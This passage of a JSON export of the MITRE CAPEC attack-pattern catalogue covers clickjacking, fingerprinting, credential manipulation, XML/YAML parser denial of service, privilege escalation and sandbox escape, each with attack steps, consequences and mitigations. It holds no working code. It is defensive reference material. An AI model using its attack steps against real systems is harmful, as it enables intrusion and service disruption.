Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Configuration: Disable iFrames in the Web browser.","Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.","Operation: If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames."]},"Example_Instances":{"Example":"The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \\"Don\'t Click.\\" This button is aligned with the invisible \\"Update\\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to their Twitter profile."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"References":{"Reference":[{"External_Reference_ID":"REF-84"},{"External_Reference_ID":"REF-85"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"224":{"ID":"224","Name":"Fingerprinting","Abstraction":"Meta","Status":"Stable","Description":"An adversary compares output from a target system to known indicators that uniquely identify specific details about the target. Most commonly, fingerprinting is done to determine operating system and application versions. Fingerprinting can be done passively as well as actively. Fingerprinting by itself is not usually detrimental to the target. However, the information gathered through fingerprinting often enables an adversary to discover existing weaknesses in the target.","Likelihood_Of_Attack":"High","Typical_Severity":"Very Low","Prerequisites":{"Prerequisite":"A means by which to interact with the target system directly."},"Skills_Required":{"Skill":["Some fingerprinting activity requires very specific knowledge of how different operating systems respond to various TCP/IP requests. Application fingerprinting can be as easy as envoking the application with the correct command line argument, or mouse clicking in the appropriate place on the screen.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"If on a network, the adversary needs a tool capable of viewing network communications at the packet level and with header information, like Mitmproxy, Wireshark, or Fiddler."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"While some information is shared by systems automatically based on standards and protocols, remove potentially sensitive information that is not necessary for the application\'s functionality as much as possible."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"45","Entry_Name":"Fingerprinting"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Taxonomy_Mappings"}]}},"226":{"ID":"226","Name":"Session Credential Falsification through Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server. For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"196"}},"Prerequisites":{"Prerequisite":"The targeted application must use session credentials to identify legitimate users."},"Resources_Required":{"Resource":"An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"565"},{"CWE_ID":"472"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"227":{"ID":"227","Name":"Sustained Client Engagement","Abstraction":"Meta","Status":"Draft","Description":"An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary\'s primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource. The degree to which the attack is successful depends upon the adversary\'s ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target\'s ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.","Prerequisites":{"Prerequisite":"This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame."},"Resources_Required":{"Resource":"To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests."},"Mitigations":{"Mitigation":"Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses."},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499","Entry_Name":"Endpoint Denial of Service"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"228":{"ID":"228","Name":"DTD Injection","Abstraction":"Detailed","Status":"Draft","Description":"An attacker injects malicious content into an application\'s DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"250"},{"Nature":"CanPrecede","CAPEC_ID":"197"},{"Nature":"CanPrecede","CAPEC_ID":"491"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.","Technique":["Use an automated tool to record all instances of URLs to process XML requests.","Use a browser to manually explore the website and analyze how the application processes XML requests."]},{"Step":"2","Phase":"Explore","Description":"[Determine use of XML with DTDs] Examine application input to identify XML input that leverage the use of one or more DTDs.","Technique":["Examine any available documentation for the application that discusses expected XML input.","Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD."]},{"Step":"3","Phase":"Exploit","Description":"[Craft and inject XML containg malicious DTD payload]","Technique":["Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.","Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts."]}]},"Prerequisites":{"Prerequisite":"The target must be running an XML based application that leverages DTDs."},"Mitigations":{"Mitigation":["Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.","Implementation: Disallow the inclusion of DTDs as part of incoming messages.","Implementation: Use XML parsing tools that protect against DTD attacks."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"References":{"Reference":{"External_Reference_ID":"REF-86"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"229":{"ID":"229","Name":"Serialized Data Parameter Blowup","Abstraction":"Detailed","Status":"Draft","Description":"This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"231"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.","Technique":["Use an automated tool to record all instances of URLs to process requests from serialized data.","Use a browser to manually explore the website and analyze how the application processes requests using serialized data."]},{"Step":"2","Phase":"Exploit","Description":"[Launch a Blowup attack] The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.","Technique":"Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service."}]},"Prerequisites":{"Prerequisite":"The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)"},"Mitigations":{"Mitigation":["This attack may be mitigated completely by using a parser that is not using a vulnerable container.","Mitigation may limit the number of configuration parameters per dataset."]},"Example_Instances":{"Example":[{"p":["In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).","A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources."],"div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative"}]},{"p":"A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. This may lead to denial of service or instability resulting from excessive resource consumption."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"41","Entry_Name":"XML Attribute Blowup"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Description, Description Summary, Examples-Instances, Injection_Vector, Methods_of_Attack, Payload, Related_Attack_Patterns, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["XML Attribute Blowup",{"Date":"2020-07-30"}]}},"230":{"ID":"230","Name":"Serialized Data with Nested Payloads","Abstraction":"Standard","Status":"Draft","Description":"Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.","Extended_Description":{"p":["An adversary\'s goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].","This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends."]},"Alternate_Terms":{"Alternate_Term":{"Term":"XML Denial of Service (XML DoS)"}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim\'s side."},{"Step":"2","Phase":"Exploit","Description":"An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim\'s system."}]},"Prerequisites":{"Prerequisite":["An application\'s user-controllable data is expressed in a language that supports subsitution.","An application does not perform sufficient validation to ensure that user-controllable data is not malicious."]},"Indicators":{"Indicator":"Bad data is passed to the data parser (possibly repeatedly), possibly making it crash or execute arbitrary code."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. Ensure that the resultant data is safe to pass to the data parser.","Perform validation on canonical data.","Pick a robust implementation of the data parser."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"112"},{"CWE_ID":"20"},{"CWE_ID":"674"},{"CWE_ID":"770"}]},"References":{"Reference":{"External_Reference_ID":"REF-89","Section":"What is an XML Parser Attack?"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Alternate_Terms, Description, Execution_Flow, Indicators, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name, Description, Execution_Flow, Extended_Description, Indicators, Mitigations, Prerequisites, Skills_Required"}],"Previous_Entry_Name":["XML Nested Payloads",{"Date":"2021-10-21"}]}},"231":{"ID":"231","Name":"Oversized Serialized Data Payloads","Abstraction":"Standard","Status":"Draft","Description":"Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary\'s goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider\'s memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.","Alternate_Terms":{"Alternate_Term":{"Term":"XML Denial of Service (XML DoS)"}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"130","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"An adversary determines the input data stream that is being processed by an serialized data parser on the victim\'s side."},{"Step":"2","Phase":"Experiment","Description":"An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim\'s system."}]},"Prerequisites":{"Prerequisite":["An application uses an parser for serialized data to perform transformation on user-controllable data.","An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser."]},"Skills_Required":{"Skill":["Denial of service",{"Level":"Low"},"Arbitrary code execution",{"Level":"High"}]},"Indicators":{"Indicator":"Bad data is passed to the serialized data parser (possibly repeatedly), possibly making it crash or execute arbitrary code."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. Ensure that the resultant data is safe to pass to the parser.","Perform validation on canonical data.","Pick a robust implementation of the serialized data parser.","Validate data against a valid schema or DTD prior to parsing."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"112"},{"CWE_ID":"20"},{"CWE_ID":"674"},{"CWE_ID":"770"}]},"References":{"Reference":{"External_Reference_ID":"REF-89","Section":"What is an XML Parser Attack?"}},"Notes":{"Note":["In many cases this type of an attack will result in an XML Denial of Service (XDoS) or similar Denial of Service (DoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].",{"Type":"Other"},"The main weakness in serialized data related DoS is that the service provider generally must inspect, parse, and validate the data messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that DoS targets.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Alternate_Terms, Description, Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Execution_Flow, Indicators, Mitigations, Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["XML Oversized Payloads",{"Date":"2020-07-30"}]}},"233":{"ID":"233","Name":"Privilege Escalation","Abstraction":"Meta","Status":"Draft","Description":"An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.","Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"269"},{"CWE_ID":"1264"},{"CWE_ID":"1311"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1548","Entry_Name":"Abuse Elevation Control Mechanism"}},"References":{"Reference":{"External_Reference_ID":"REF-600","Section":"Testing for Privelege Escalation"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description, Description Summary, Relationships, Type (Category -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Abstraction"}]}},"234":{"ID":"234","Name":"Hijacking a privileged process","Abstraction":"Standard","Status":"Draft","Description":"An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanFollow","CAPEC_ID":"242"},{"Nature":"CanFollow","CAPEC_ID":"175"},{"Nature":"CanFollow","CAPEC_ID":"100"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find process with elevated priveleges] The adversary probes for processes running with elevated privileges.","Technique":["On Windows, use the process explorer\'s security tab to see if a process is running with administror privileges.","On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user."]},{"Step":"2","Phase":"Experiment","Description":"[Find vulnerability in running process] The adversary looks for a vulnerability in the running process that would allow for arbitrary code execution with the privilege of the running process.","Technique":["Look for improper input validation","Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.","Utilize system utilities that support process control that have been inadequately secured"]},{"Step":"3","Phase":"Exploit","Description":"[Execute arbitrary code] The adversary exploits the vulnerability that they have found and hijacks the running process."}]},"Prerequisites":{"Prerequisite":"The targeted process or operating system must contain a bug that allows attackers to hijack the targeted process."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"648"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"}]}},"237":{"ID":"237","Name":"Escaping a Sandbox by Calling Code in Another Language","Abstraction":"Detailed","Status":"Draft","Description":"The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"480"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probing] The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.","Technique":"The attacker probes the target application to see whether calling code of another language is allowed within a sandbox."},{"Step":"2","Phase":"Explore","Description":"[Analysis] The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.","Technique":"The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox."},{"Step":"3","Phase":"Experiment","Description":"[Verify the exploitable security weaknesses] The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.","Technique":"The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox."},{"Step":"4","Phase":"Exploit","Description":"[Exploit the security weaknesses in the standard libraries] The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.","Technique":"The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries."}]},"Skills_Required":{"Skill":["The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail.",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.","Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.","Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.","Configuration: Get latest updates for the computer."]},"Example_Instances":{"Example":"Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \\"msits.exe\\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user\'s machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"693"}},"References":{"Reference":[{"External_Reference_ID":"REF-91"},{"External_Reference_ID":"REF-92","Section":"Exploit: Java/ByteVerify.C"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE 